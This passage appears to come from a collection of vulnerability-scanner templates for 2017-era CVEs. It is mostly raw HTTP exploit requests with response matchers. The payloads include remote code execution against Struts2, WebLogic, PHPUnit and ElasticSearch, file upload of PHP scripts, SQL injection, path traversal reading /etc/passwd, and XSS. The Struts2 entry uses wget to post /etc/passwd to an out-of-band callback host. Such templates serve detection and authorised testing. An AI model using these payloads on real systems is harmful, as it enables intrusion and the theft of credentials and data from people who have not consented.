HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2017-6090","info":{"name":"PhpColl 2.5.1 Arbitrary File Upload","severity":"high"},"requests":[{"raw":["POST /clients/editclient.php?id={{randstr}}&action=update HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------154934846911423734231554128137\n\n-----------------------------154934846911423734231554128137\nContent-Disposition: form-data; name=\"upload\"; filename=\"{{randstr}}.php\"\nContent-Type: application/x-php\n\n<?php echo md5('phpcollab_rce');?>\n\n-----------------------------154934846911423734231554128137--\n","GET /logos_clients/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["48dbd2384cb6b996fa1e2855c7f0567f"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-11610","info":{"name":"XML-RPC Server - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /RPC2 HTTP/1.1\nHost: {{Hostname}}\nAccept: text/xml\nContent-type: text/xml\n\n<methodCall>\n  <methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>\n  <params>\n    <param>\n      <string>nslookup {{interactsh-url}}</string>\n    </param>\n  </params>\n</methodCall>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"header","words":["text/xml"]},{"type":"word","part":"body","words":["<methodResponse>","<int>"],"condition":"and"}]}]},{"id":"CVE-2017-0929","info":{"name":"DotNetNuke (DNN) ImageHandler <9.2.0 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/DnnImageHandler.ashx?mode=file&url=http://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2017-15715","info":{"name":"Apache httpd <=2.4.29 - Arbitrary File Upload","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryKc8fBVDo558U4hbJ\n\n------WebKitFormBoundaryKc8fBVDo558U4hbJ\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.php\"\n\n{{randstr_1}}\n\n------WebKitFormBoundaryKc8fBVDo558U4hbJ\nContent-Disposition: form-data; name=\"name\"\n\n{{randstr}}.php\\x0A\n------WebKitFormBoundaryKc8fBVDo558U4hbJ--\n","GET /{{randstr}}.php\\x0A HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip,deflate\nAccept: */*\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_2, \"{{randstr_1}}\")"]}]}]},{"id":"CVE-2017-5982","info":{"name":"Kodi 17.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/image/image%3A%2F%2F%2e%2e%252fetc%252fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-9416","info":{"name":"Odoo 8.0/9.0/10.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/base_import/static/c:/windows/win.ini","{{BaseURL}}/base_import/static/etc/passwd"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["regex('root:.*:0:0:', body)","status_code == 200"],"condition":"and"},{"type":"dsl","dsl":["contains(body, 'bit app support')","contains(body, 'fonts')","contains(body, 'extensions')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2017-17562","info":{"name":"Embedthis GoAhead <3.6.5 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /cgi-bin/{{endpoint}}?LD_DEBUG=help HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"payloads":{"endpoint":["admin","apply","non-CA-rev","cgitest","checkCookie","check_user","chn/liveView","cht/liveView","cnswebserver","config","configure/set_link_neg","configure/swports_adjust","eng/liveView","firmware","getCheckCode","get_status","getmac","getparam","guest/Login","home","htmlmgr","index","index/login","jscript","kvm","liveView","login","login.asp","login/login","login/login-page","login_mgr","luci","main","main-cgi","manage/login","menu","mlogin","netbinary","nobody/Captcha","nobody/VerifyCode","normal_userLogin","otgw","page","rulectl","service","set_new_config","sl_webviewer","ssi","status","sysconf","systemutil","t/out","top","unauth","upload","variable","wanstatu","webcm","webmain","webproc","webscr","webviewLogin","webviewLogin_m64","webviewer","welcome"]},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["environment variable","display library search paths"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-17451","info":{"name":"WordPress Mailster <=1.5.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php?mes=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-5631","info":{"name":"KMCIS CaseAware - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login.php?mid=0&usr=admin%27%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-5487","info":{"name":"WordPress Core <4.7.1 - Username Enumeration","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/wp/v2/users/","{{BaseURL}}/?rest_route=/wp/v2/users/"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"id\":","\"name\":","\"avatar_urls\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"json","name":"usernames","json":[".[] | .slug",".[].name"],"part":"body"}]}]},{"id":"CVE-2017-14651","info":{"name":"WSO2 Data Analytics Server 3.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/carbon/resources/add_collection_ajaxprocessor.jsp?collectionName=%3Cimg%20src=x%20onerror=alert(document.domain)%3E&parentPath=%3Cimg%20src=x%20onerror=alert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>","Failed to add new collection"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2017-18536","info":{"name":"WordPress Stop User Enumeration <=1.3.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?author=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-12583","info":{"name":"DokuWiki - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/dokuwiki/doku.php?id=wiki:welcome&at=<svg%20onload=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Unable to parse at parameter \"<svg onload=alert(document.domain)>\".</div>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-5521","info":{"name":"NETGEAR Routers - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/passwordrecovered.cgi?id={{rand_base(5)}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["right\">Router\\s*Admin\\s*Username<","right\">Router\\s*Admin\\s*Password<"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-8917","info":{"name":"Joomla! <3.7.1 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5({{num}})),1)"],"matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]}]}]},{"id":"CVE-2017-1000486","info":{"name":"Primetek Primefaces 5.x - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\nAccept-Encoding: gzip, deflate\n\npfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVbBkVHj5xLXXCaFGpOHe704aOkNwaB12Cc3Iq6NmBo%2BQZuqhqtPxdTA%3D%3D\n"],"matchers":[{"type":"word","part":"header","words":["Mogwailabs: CHECKCHECK"]}]}]},{"id":"CVE-2017-12637","info":{"name":"SAP NetWeaver Application Server Java 7.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS?/.."],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["WEB-INF","META-INF"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-9805","info":{"name":"Apache Struts2 S2-052 - Remote Code Execution","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/struts2-rest-showcase/orders/3","{{BaseURL}}/orders/3"],"body":"<map>\n  <entry>\n    <jdk.nashorn.internal.objects.NativeString>\n      <flags>0</flags>\n      <value class=\"com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data\">\n        <dataHandler>\n          <dataSource class=\"com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource\">\n            <is class=\"javax.crypto.CipherInputStream\">\n              <cipher class=\"javax.crypto.NullCipher\">\n                <initialized>false</initialized>\n                <opmode>0</opmode>\n                <serviceIterator class=\"javax.imageio.spi.FilterIterator\">\n                  <iter class=\"javax.imageio.spi.FilterIterator\">\n                    <iter class=\"java.util.Collections$EmptyIterator\"/>\n                    <next class=\"java.lang.ProcessBuilder\">\n                      <command>\n                        <string>wget</string>\n                        <string>--post-file</string>\n                        <string>/etc/passwd</string>\n              <string>{{interactsh-url}}</string>\n                      </command>\n                      <redirectErrorStream>false</redirectErrorStream>\n                    </next>\n                  </iter>\n                  <filter class=\"javax.imageio.ImageIO$ContainsFilter\">\n                    <method>\n                      <class>java.lang.ProcessBuilder</class>\n                      <name>start</name>\n                      <parameter-types/>\n                    </method>\n                    <name>asdasd</name>\n                  </filter>\n                  <next class=\"string\">asdasd</next>\n                </serviceIterator>\n                <lock/>\n              </cipher>\n              <input class=\"java.lang.ProcessBuilder$NullInputStream\"/>\n              <ibuffer></ibuffer>\n              <done>false</done>\n              <ostart>0</ostart>\n              <ofinish>0</ofinish>\n              <closed>false</closed>\n            </is>\n            <consumed>false</consumed>\n          </dataSource>\n          <transferFlavors/>\n        </dataHandler>\n        <dataLen>0</dataLen>\n      </value>\n    </jdk.nashorn.internal.objects.NativeString>\n    <jdk.nashorn.internal.objects.NativeString reference=\"../jdk.nashorn.internal.objects.NativeString\"/>\n  </entry>\n  <entry>\n    <jdk.nashorn.internal.objects.NativeString reference=\"../../entry/jdk.nashorn.internal.objects.NativeString\"/>\n    <jdk.nashorn.internal.objects.NativeString reference=\"../../entry/jdk.nashorn.internal.objects.NativeString\"/>\n  </entry>\n</map>\n","headers":{"Content-Type":"application/xml"},"matchers-condition":"and","matchers":[{"type":"word","words":["Debugging information","com.thoughtworks.xstream.converters.collections.MapConverter"],"condition":"and"},{"type":"status","status":[500]}]}]},{"id":"CVE-2017-16806","info":{"name":"Ulterius Server < 1.9.5.0 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.../.../.../.../.../.../.../.../.../windows/win.ini","{{BaseURL}}/.../.../.../.../.../.../.../.../.../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","\\[(font|extension|file)s\\]"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-7615","info":{"name":"MantisBT <=2.30 - Arbitrary Password Reset/Admin Access","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/verify.php?id=1&confirm_hash=","{{BaseURL}}/mantis/verify.php?id=1&confirm_hash=","{{BaseURL}}/mantisBT/verify.php?id=1&confirm_hash=","{{BaseURL}}/mantisbt-2.3.0/verify.php?id=1&confirm_hash=","{{BaseURL}}/bugs/verify.php?confirm_hash=&id=1"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<input type=\"hidden\" name=\"account_update_token\" value=\"([a-zA-Z0-9_-]+)\""]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-9841","info":{"name":"PHPUnit - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/html\n\n<?php echo md5(phpunit_rce);?>\n","GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/html\n\n<?php echo md5(phpunit_rce);?>\n","GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/html\n\n<?php echo md5(phpunit_rce);?>\n","GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/html\n\n<?php echo md5(phpunit_rce);?>\n","GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/html\n\n<?php echo md5(phpunit_rce);?>\n","GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/html\n\n<?php echo md5(phpunit_rce);?>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["6dd70f16549456495373a337e6708865"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-14537","info":{"name":"Trixbox 2.8.0 - Path Traversal","severity":"medium"},"requests":[{"raw":["POST /maint/index.php?packages HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{Hostname}}/maint/index.php?packages\nCookie: lng=en; security_level=0; PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2\nAuthorization: Basic bWFpbnQ6cGFzc3dvcmQ=\n\nxajax=menu&xajaxr=1504969293893&xajaxargs[]=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&xajaxargs[]=yumPackages\n","GET /maint/modules/home/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00english HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nReferer: {{Hostname}}/maint/index.php?packages\nCookie: lng=en; security_level=0; PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2\nAuthorization: Basic bWFpbnQ6cGFzc3dvcmQ=\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-17736","info":{"name":"Kentico - Installer Privilege Escalation","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/CMSInstall/install.aspx"],"matchers-condition":"or","matchers":[{"type":"word","words":["Kentico","Database Setup","SQLServer"],"condition":"and"},{"type":"word","words":["Database Setup","SQLServer"],"condition":"and"}]}]},{"id":"CVE-2017-7269","info":{"name":"Windows Server 2003 & IIS 6.0 - Remote Code Execution","severity":"critical"},"requests":[{"method":"OPTIONS","path":["{{BaseURL}}"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["regex(\"<DAV:sql>\", dasl)","regex(\"[\\d]+(,\\s+[\\d]+)?\", dav)","regex(\".*?PROPFIND\", public)","regex(\".*?PROPFIND\", allow)"],"condition":"or"},{"type":"word","part":"header","words":["IIS/6.0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-17731","info":{"name":"DedeCMS 5.7 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\\%27%20or%20mid=@`\\%27`%20/*!50000union*//*!50000select*/1,2,3,md5({{num}}),5,6,7,8,9%23@`\\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-3528","info":{"name":"Oracle E-Business Suite 12.1.3/12.2.x - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=%2f%5cinteract.sh"],"matchers":[{"type":"word","part":"body","words":["noresize src=\"/\\interact.sh?configName="]}]}]},{"id":"CVE-2017-18638","info":{"name":"Graphite <=1.1.5 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/composer/send_email?to={{rand_text_alpha(4)}}@{{rand_text_alpha(4)}}&url=http://{{interactsh-url}}"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2017-11165","info":{"name":"DataTaker DT80 dEX 1.50.012 - Information Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/services/getFile.cmd?userfile=config.xml"],"matchers-condition":"and","matchers":[{"type":"word","words":["COMMAND_SERVER","<loggerSettings>","config id=\"config"],"condition":"and"},{"type":"word","part":"header","words":["text/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-9791","info":{"name":"Apache Struts2 S2-053 - Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/integration/saveGangster.action"],"body":"name=%25%7b%28%23%64%6d%3d%40%6f%67%6e%6c%2e%4f%67%6e%6c%43%6f%6e%74%65%78%74%40%44%45%46%41%55%4c%54%5f%4d%45%4d%42%45%52%5f%41%43%43%45%53%53%29%2e%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%3f%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%3d%23%64%6d%29%3a%28%28%23%63%6f%6e%74%61%69%6e%65%72%3d%23%63%6f%6e%74%65%78%74%5b%27%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%41%63%74%69%6f%6e%43%6f%6e%74%65%78%74%2e%63%6f%6e%74%61%69%6e%65%72%27%5d%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%3d%23%63%6f%6e%74%61%69%6e%65%72%2e%67%65%74%49%6e%73%74%61%6e%63%65%28%40%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%6f%67%6e%6c%2e%4f%67%6e%6c%55%74%69%6c%40%63%6c%61%73%73%29%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%2e%67%65%74%45%78%63%6c%75%64%65%64%50%61%63%6b%61%67%65%4e%61%6d%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%2e%67%65%74%45%78%63%6c%75%64%65%64%43%6c%61%73%73%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%63%6f%6e%74%65%78%74%2e%73%65%74%4d%65%6d%62%65%72%41%63%63%65%73%73%28%23%64%6d%29%29%29%29%2e%28%23%71%3d%28{{num1}}%2a{{num2}}%29%29%2e%28%23%71%29%7d&age=10&__checkbox_bustedBefore=true&description=\n","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{result}}","added successfully"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18598","info":{"name":"WordPress Qards - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/qards/html2canvasproxy.php?url=https://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["console.log"]}]}]},{"id":"CVE-2017-17043","info":{"name":"WordPress Emag Marketplace Connector 1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php?post=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-12544","info":{"name":"HPE System Management - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/gsearch.php.en?prod=';prompt`document.domain`;//"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var prodName = '';prompt`document.domain`;//';"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-11444","info":{"name":"Subrion CMS <4.1.5.10 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/search/members/?id`%3D520)%2f**%2funion%2f**%2fselect%2f**%2f1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2Cunhex%28%2770726f6a656374646973636f766572792e696f%27%29%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%23sqli=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["projectdiscovery.io"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-11586","info":{"name":"FineCMS <5.0.9 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /index.php?s=member&c=login&m=index HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nback=&data%5Busername%5D={{username}}&data%5Bpassword%5D={{password}}&data%5Bauto%5D=1\n","GET /index.php?c=weixin&m=sync&url=http://interact.sh HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"regex","part":"header","regex":["Refresh:(.*)url=http:\\/\\/interact\\.sh"]}]}]},{"id":"CVE-2017-14524","info":{"name":"OpenText Documentum Administrator 7.2.0180.0055 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/xda/help/en/default.htm?startat=//oast.me"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?oast\\.me(?:\\s*?)$"]}]}]},{"id":"CVE-2017-12149","info":{"name":"Jboss Application Server - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /invoker/JMXInvokerServlet/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/octet-stream\n\n{{ base64_decode(\"rO0ABXNyABNqYXZhLnV0aWwuQXJyYXlMaXN0eIHSHZnHYZ0DAAFJAARzaXpleHAAAAACdwQAAAACdAAJZWxlbWVudCAxdAAJZWxlbWVudCAyeA==\") }}\n","POST /invoker/EJBInvokerServlet/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/octet-stream\n\n{{ base64_decode(\"rO0ABXNyABNqYXZhLnV0aWwuQXJyYXlMaXN0eIHSHZnHYZ0DAAFJAARzaXpleHAAAAACdwQAAAACdAAJZWxlbWVudCAxdAAJZWxlbWVudCAyeA==\") }}\n","POST /invoker/readonly HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/octet-stream\n\n{{ base64_decode(\"rO0ABXNyABNqYXZhLnV0aWwuQXJyYXlMaXN0eIHSHZnHYZ0DAAFJAARzaXpleHAAAAACdwQAAAACdAAJZWxlbWVudCAxdAAJZWxlbWVudCAyeA==\") }}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ClassCastException"]},{"type":"status","status":[200,500]}]}]},{"id":"CVE-2017-5689","info":{"name":"Intel Active Management - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","GET /hw-sys.htm HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"digest-username":"admin","matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["System Status","Active Management Technology"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-16877","info":{"name":"Nextjs <2.4.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/_next/../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-10271","info":{"name":"Oracle WebLogic Server - Remote Command Execution","severity":"high"},"requests":[{"raw":["POST /wls-wsat/CoordinatorPortType HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nAccept-Language: en\nContent-Type: text/xml\n\n<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<soapenv:Envelope\n    xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n    <soapenv:Header>\n        <work:WorkContext\n            xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n            <java version=\"1.4.0\" class=\"java.beans.XMLDecoder\">\n                <void class=\"java.lang.ProcessBuilder\">\n                    <array class=\"java.lang.String\" length=\"3\">\n                        <void index=\"0\">\n                            <string>/bin/bash</string>\n                        </void>\n                        <void index=\"1\">\n                            <string>-c</string>\n                        </void>\n                        <void index=\"2\">\n                            <string>ping -c 1 {{interactsh-url}}</string>\n                        </void>\n                    </array>\n                    <void method=\"start\"/></void>\n            </java>\n        </work:WorkContext>\n    </soapenv:Header>\n    <soapenv:Body/>\n</soapenv:Envelope>\n","POST /wls-wsat/CoordinatorPortType HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nAccept-Language: en\nContent-Type: text/xml\n\n<?xml version=\"1.0\" encoding=\"utf-8\"?>\n  <soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n      <soapenv:Header>\n          <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n              <java>\n                  <void class=\"java.lang.Thread\" method=\"currentThread\">\n                      <void method=\"getCurrentWork\">\n                          <void method=\"getResponse\">\n                              <void method=\"getServletOutputStream\">\n                                  <void method=\"flush\"/>\n                              </void>\n                              <void method=\"getWriter\"><void method=\"write\"><string>{{randstr}}</string></void></void>\n                          </void>\n                      </void>\n                  </void>\n              </java>\n          </work:WorkContext>\n      </soapenv:Header>\n      <soapenv:Body/>\n</soapenv:Envelope>\n"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["regex(\"<faultstring>java.lang.ProcessBuilder || <faultstring>0\", body)","contains(interactsh_protocol, \"dns\")","status_code == 500"],"condition":"and"},{"type":"dsl","dsl":["body == \"{{randstr}}\"","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2017-4011","info":{"name":"McAfee Network Data Loss Prevention 9.3.x - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"headers":{"User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1';alert(/XSS/);//"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var ua='Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1';alert(/XSS/);//"]},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2015-9312","info":{"name":"NewStatPress <=1.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?groupby1=checked%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29&page=nsp_search&newstatpress_action=search HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"<img src=x onerror=alert(document.domain)\")","contains(body_2, \"newstatpress\")"],"condition":"and"}]}]},{"id":"CVE-2015-1427","info":{"name":"ElasticSearch - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /website/blog/ HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nAccept-Language: en\nContent-Type: application/x-www-form-urlencoded\n\n{\n  \"name\": \"test\"\n}\n","POST /_search HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\n{\"size\":1, \"script_fields\": {\"lupin\":{\"lang\":\"groovy\",\"script\": \"java.lang.Math.class.forName(\\\"java.lang.Runtime\\\").getRuntime().exec(\\\"cat 